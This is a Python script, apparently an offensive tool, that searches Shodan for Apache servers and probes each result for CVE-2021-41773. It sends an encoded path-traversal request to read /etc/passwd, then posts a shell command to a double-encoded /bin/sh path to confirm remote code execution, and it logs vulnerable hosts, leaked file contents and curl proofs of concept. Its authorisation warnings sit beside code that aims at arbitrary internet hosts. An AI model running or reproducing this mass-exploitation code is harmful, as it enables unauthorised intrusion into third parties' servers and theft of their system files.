#!/usr/bin/python3
import argparse
import os
import socket
import ssl
import sys
import urllib.error
import urllib.request

import requests
import shodan
from termcolor import colored
# Print the tool banner
def banner():
    """Print the tool's ASCII-art banner to stdout in green.

    Purely cosmetic; called before usage errors and before a scan starts.
    """
    art = """
_ _ _
/ \ _ __ __ _ ___| |__ _ _| | __
/ _ \ | '_ \ / _` |/ __| '_ \| | | | |/ /
/ ___ \| |_) | (_| | (__| | | | |_| | <
/_/ \_\ .__/ \__,_|\___|_| |_|\__,_|_|\_\
|_|
[CVE-2021-41773 Grabber]
"""
    print(colored(art, 'green'))
# Command-line argument parsing
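def parse_args():
    """Parse the command line and return the argparse namespace.

    Returns:
        Namespace with ``api_key`` (str) and ``keyword`` (str or None).

    The Shodan key may be given with ``-a/--api-key`` or, preferably, through
    the ``SHODAN_API_KEY`` environment variable: a secret passed as a command
    line argument lands in shell history and is visible to every local user in
    ``ps`` output.  Usage errors are routed to ``parser_error`` (banner +
    usage, then exit) instead of argparse's default handler.
    """
    parser = argparse.ArgumentParser(
        # The previous example referenced a "-d" option this tool does not have.
        epilog='\tExample: \r\npython3 ' + sys.argv[0]
        + ' -a <SHODAN_API_KEY> -k "apache 2.4.49"'
    )
    parser.error = parser_error
    parser._optionals.title = "OPTIONS"
    parser.add_argument(
        '-a', '--api-key',
        help="Shodan API Key (defaults to the SHODAN_API_KEY environment variable)",
        default=os.environ.get("SHODAN_API_KEY"),
    )
    parser.add_argument('-k', '--keyword', help='Keyword For Shodan', nargs='?', required=False)
    args = parser.parse_args()
    if not args.api_key:
        # required=True cannot express "flag OR environment variable", so the
        # check is done after parsing; parser.error exits via parser_error.
        parser.error("a Shodan API key is required (-a/--api-key or SHODAN_API_KEY)")
    return args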
# Usage-error handler installed as ArgumentParser.error
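def parser_error(errmsg):
    """Report a command-line usage error and exit.

    Installed on the parser as ``parser.error``, so argparse calls it with the
    reason for the failure (missing option, bad value, ...).

    Args:
        errmsg: argparse's description of what was wrong.

    Exits with status 2 (argparse's convention) so callers can distinguish a
    usage error from a completed scan; the old handler exited 0 and dropped
    ``errmsg`` entirely, leaving the user guessing.
    """
    banner()
    print(colored("[ERROR] " + str(errmsg), 'red'))
    print(colored("Usage: python3 " + sys.argv[0] + " [Options] use -h for help", 'red'))
    sys.exit(2)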
# Main scan routine: Shodan search, then per-host traversal and RCE probes
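# Request paths for CVE-2021-41773 (Apache httpd 2.4.49 path normalisation
# bypass).  Both must reach the server byte-for-byte: the encoded dot
# sequences are the bypass, and a client that normalises them first would
# silently turn a vulnerable host into a "not vulnerable" result.
_TRAVERSAL_PATH = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
_RCE_PATH = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"


def _insecure_tls_context():
    """TLS context without certificate checks (mirrors verify=False on the requests side).

    The targets are arbitrary Shodan results, typically with self-signed or
    mismatched certificates; the scan fingerprints them and never trusts them.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def _probe_traversal(base_url):
    """Try to read /etc/passwd through the path-traversal URL.

    Args:
        base_url: ``scheme://host:port`` without a trailing slash.

    Returns:
        The decoded response body when the server answered 200 and the body
        contains ``/bin/`` (a passwd-file marker), otherwise ``None``.

    Raises:
        urllib.error.HTTPError: 4xx/5xx answer (the path was rejected).
        urllib.error.URLError, socket.timeout: connection problems.
    """
    req = urllib.request.Request(base_url + _TRAVERSAL_PATH)
    with urllib.request.urlopen(req, timeout=5, context=_insecure_tls_context()) as resp:
        if resp.status != 200:
            return None
        # Unknown servers may send non-UTF-8 bytes; a decode error must not
        # hide a positive result or abort the scan.
        body = resp.read().decode('utf-8', errors="replace")
    return body if "/bin/" in body else None


def _probe_rce(base_url):
    """POST ``echo; uname`` to the double-encoded /bin/sh path.

    Args:
        base_url: ``scheme://host:port`` without a trailing slash.

    Returns:
        True only when the body is exactly ``Linux``/``linux``, i.e. the
        request reached a shell and the output of ``uname`` came back.

    Raises:
        requests.RequestException: connection/timeout/TLS failures.

    This executes a command on the remote host.  Only run it against systems
    you are explicitly authorised to test.
    """
    url = base_url + _RCE_PATH
    with requests.Session() as session:
        prepared = requests.Request(method='POST', url=url, data="echo; uname").prepare()
        # prepare() re-quotes the URL, which would rewrite the %%32%65
        # sequences; overwriting the URL afterwards sends it exactly as built.
        prepared.url = url
        resp = session.send(prepared, verify=False, timeout=10)
    return resp.text.strip() in ("Linux", "linux")


def _scan_host(host, output):
    """Probe one Shodan result and record what was found.

    Args:
        host: a Shodan banner dict; ``ip_str`` is required, ``port``,
            ``hostnames`` and ``ssl`` are used when present.
        output: open, append-mode handle for ``vulnerable-host.txt``.

    Never raises for a single host: per-host failures are printed and the
    caller moves on to the next result.
    """
    ip = host["ip_str"]
    # Shodan reports the listener's port; the old code always hit port 80
    # and so missed Apache instances on any other port.
    port = host.get("port", 80)
    # NOTE(review): assumes Shodan marks TLS services with an ``ssl`` key or
    # port 443 -- confirm against the API if https hosts show up as errors.
    scheme = "https" if host.get("ssl") is not None or port == 443 else "http"
    base_url = "%s://%s:%s" % (scheme, ip, port)

    try:
        leaked = _probe_traversal(base_url)
    except urllib.error.HTTPError:
        # 403/404 etc.: the path was rejected, which is the patched behaviour.
        leaked = None
    except socket.timeout:
        print(colored('[INFO] Server %s IS NOT RESPONSE' % ip, 'yellow'))
        return
    except urllib.error.URLError:
        print(colored('[INFO] Server %s IS Error' % ip, 'yellow'))
        return
    except Exception as exc:
        # Keep the scan going, but say what happened instead of swallowing it.
        print(colored("[INFO] Server %s unexpected error: %s" % (ip, exc), 'yellow'))
        return

    if leaked is None:
        print(colored('[INFO] Server %s IS NOT VULNERABLE' % ip, 'yellow'))
        return

    print(colored('[VULN] Server %s IS VULNERABLE Directory Traversal' % ip, 'red'))
    poc_url = base_url + _TRAVERSAL_PATH
    output.write(
        "IP : %s\nport:%s\nhostnames : %s\n%s\nPoC: curl -v --path-as-is %s\n"
        % (ip, port, host.get("hostnames", []), leaked, poc_url)
    )
    output.flush()  # partial results survive a Ctrl-C or a crash later on

    try:
        rce = _probe_rce(base_url)
    except requests.RequestException as exc:
        print(colored("[INFO] Server %s RCE probe failed: %s" % (ip, exc), 'yellow'))
        return
    if rce:
        print(colored("[VULN] Server %s IS VULNERABLE RCE" % ip, 'red'))
        with open("vulnerable-rce.txt", "a") as rce_file:
            rce_file.write(ip + "\n")
    else:
        print(colored('[INFO] Server %s IS NOT VULNERABLE RCE' % ip, 'red'))


def interactive():
    """Entry point: pull hosts from Shodan and probe each for CVE-2021-41773.

    Every result for ``--keyword`` is first tested with the path-traversal
    read of ``/etc/passwd``; hits are appended to ``vulnerable-host.txt``
    (ip, port, hostnames, the leaked file and a curl PoC) and then tested for
    RCE, with confirmed hosts appended to ``vulnerable-rce.txt``.

    Both probes send traffic to third-party hosts and the RCE probe runs a
    command on them -- use this only against systems you are authorised to
    test.  Exits 1 on Ctrl-C and 2 on usage or Shodan API errors.
    """
    args = parse_args()
    api_key = args.api_key
    keyword = args.keyword
    banner()
    if not keyword:
        # search_cursor(None) would only fail later with an unhelpful error.
        print(colored("[ERROR] A Shodan search keyword is required (-k/--keyword)", 'red'))
        sys.exit(2)

    api = shodan.Shodan(api_key)
    try:
        # search_cursor() is lazy, so it cannot validate the key; info() makes
        # a real call and fails fast on a bad key.
        api.info()
    except shodan.APIError as exc:
        print(colored("[ERROR] Shodan API error: %s" % exc, 'red'))
        sys.exit(2)
    print(colored("[INFO] API KEY VALID", 'green'))

    try:
        with open("vulnerable-host.txt", "a") as output:
            for host in api.search_cursor(keyword):
                _scan_host(host, output)
    except shodan.APIError as exc:
        print(colored("[ERROR] Shodan API error: %s" % exc, 'red'))
        sys.exit(2)
    except KeyboardInterrupt:
        sys.exit(1)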
if __name__ == "__main__":
    # Script entry point; interactive() returns None, so the process exits 0
    # unless it called sys.exit() itself.
    raise SystemExit(interactive())